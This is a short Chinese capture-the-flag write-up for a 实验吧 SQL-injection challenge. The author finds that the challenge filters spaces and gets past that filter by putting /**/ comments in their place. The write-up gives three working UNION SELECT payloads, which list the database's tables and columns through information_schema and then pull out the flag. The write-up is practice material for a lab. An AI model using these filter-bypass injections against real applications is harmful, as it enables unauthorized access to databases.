实验吧Web-中-简单的sql注入之2
2024-09-01 23:52:07
输入union select、order by这些关键字会提示SQLi detected! 说明对于关键字有防护
输入1 union也会提示SQLi detected! 但是如果去掉空格:1union,则会返回正常,1'and'1'='1(无空格)也返回正常
所以可能是过滤了空格。
于是用/**/ 或++代替掉空格。
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
后面单独的'用了闭合掉一个'号
最下面看到flag表,于是再用1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name='flag 得到
得到flag这个column,再查找其内容:1'/**/union/**/select/**/flag/**/from/**/flag/**/where/**/'1'='1
就拿到flag了。
最新文章
- HTML 5 音频(audio)
- java之DatagramSocket、DatagramPackage丶MulticastSocket 广播学习
- 【python】selenium+python自动化测试环境搭建
- Git入门学习和应用笔记
- ajax用户名案例(重点)
- 每天一道LeetCode--342. Power of Four
- 【Leetcode】Binary Tree Level Order Traversal
- struts2 实现过程和xml配置
- thinkphp 3.1.3 redis 只能读取 无法写入的问题
- appium 报错
- QT vs x64编译
- Java:集合,Map接口框架图
- python重定向sys.stdin、sys.stdout和sys.stderr
- Linux内核 runtime_PM 框架
- js不管条件是否成立都要进行变量提升
- lr的脚本调试方法
- Sails 框架学习资料
- Force SDK to create Appointment programmatically in crm 2013 onPremise
- 洛谷 P1108 低价购买 解题报告
- flask-SQLAlchemy的ORM